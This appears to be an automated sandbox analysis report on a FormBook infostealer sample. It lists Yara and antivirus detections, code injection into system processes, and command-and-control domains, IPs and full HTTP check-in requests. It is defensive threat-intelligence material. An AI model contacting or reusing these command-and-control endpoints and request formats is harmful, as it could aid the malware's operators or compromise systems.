0_2_00C6B146

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.224.212.221	www.sandstormcase.us	Australia		133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
5.101.152.161	www.nordenergogrup.store	Russian Federation		198610	BEGET-ASRU	true

Contacted Domains

Name	IP	Active
www.sandstormcase.us	103.224.212.221	true
www.nordenergogrup.store	5.101.152.161	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.nordenergogrup.store/sk29/	true	Avira URL Cloud: safe	low
http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD	true	Avira URL Cloud: safe	unknown
http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD	true	Avira URL Cloud: safe	unknown

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F61A.tmp

Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

ReversingLabs: Detection: 23%

Machine Learning detection for sample

Source: primosdv3.1.1.0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.bstkiooen.exe.1010000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.3a2f840.4.unpack	Avira: Label: TR/ATRAPS.Gen5
Source: 2.2.bstkiooen.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.60d900.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp

Uses 32bit PE files

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 4x nop then pop edi

2_2_0040E471

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.nordenergogrup.store/sk29/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.224.212.221 103.224.212.221

Source: global traffic

Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.nordenergogrup.store

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Creates a DirectInput object (often for capturing keystrokes)

Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
